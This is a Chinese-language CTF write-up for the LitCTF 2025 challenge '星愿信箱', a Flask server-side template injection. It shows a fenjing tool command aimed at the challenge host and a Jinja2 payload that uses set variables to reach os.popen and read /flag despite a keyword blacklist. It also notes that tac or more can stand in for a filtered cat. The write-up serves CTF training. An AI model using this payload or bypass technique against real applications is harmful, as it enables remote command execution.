Problem: [LitCTF 2025]星愿信箱
思路
- 解题大致思路
SSTI模版注入
插件识别框架:

可以看到是flask框架
EXP
- 具体攻击代码
比较齐全的解法:
抓包测试:

方法一:
- 这个地方的subclassed__()[137]需要爆破出来


方法二:

cat被waf掉了,可以使tac或者是more替代

方法三:
使用fenjing工具:
配置链接:
https://blog.csdn.net/m0_73683234/article/details/136789243
命令:
python -m fenjing crack-json --url 'http://node6.anna.nssctf.cn:24986/' --json-data '{"cmd": "a"}' --key cmd --replaced-keyword-strategy ignore

方法四:
使用set变量的方式:
经过测试是SSTI,可以通过设置变量绕过黑名单 {% set os = (lipsum | attr('__globals__')) | attr('get')('os') %} {% set popen = os | attr('popen') %} {% set input_cmd = "head /flag" %} {% set cmd = popen(input_cmd).read() %} {% print cmd %}

总结
- 对该题的考点总结

问一下我在使用工具不加--replaced-keyword-strategy ignore 参数无法跑出来结果,我看工具说明感觉加上ignore跟没有加没有什么区别,求讲解
加载中...